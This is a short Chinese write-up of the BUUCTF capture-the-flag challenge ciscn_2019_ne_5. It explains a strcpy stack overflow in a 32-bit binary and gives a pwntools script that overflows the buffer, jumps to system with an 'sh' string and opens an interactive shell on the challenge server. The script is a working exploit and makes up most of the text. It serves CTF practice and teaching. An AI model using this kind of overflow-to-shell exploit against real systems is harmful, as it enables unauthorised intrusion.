【BUUCTF】ciscn_2019_ne_5 Write Up
程序员文章站
2022-05-14 08:41:50
...
题目是一道32位程序,依旧是rop
仔细观察可以发现漏洞出在GetFlag函数的strcpy上,我们可以输入的字符有128个,而复制字符串的栈空间只有0x48字节
程序本身存在fflush函数,我们可以直接用它的sh来当作system的参数
from pwn import *
from LibcSearcher import *
from struct import pack
context.os='linux'
context.arch='i386'
context.log_level='debug'
sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)
io=remote('node3.buuoj.cn',29580)
#io=process('./ciscn_2019_ne_5')
elf=ELF('./ciscn_2019_ne_5')
ra()
sl('administrator')
ra()
sl('1')
ra()
sl('a'*76+p32(elf.plt['system'])+p32(0x80482ea)+p32(0x80482ea))
ra()
sl('4')
io.interactive()
system后面的一个双字是返回地址,这里用不到,直接填的sh的地址,但是要保证每一位都不为零,否则strcpy会断掉
上一篇: 利用php获取服务器时间的实现代码
下一篇: PHP之生成GIF动画的实现方法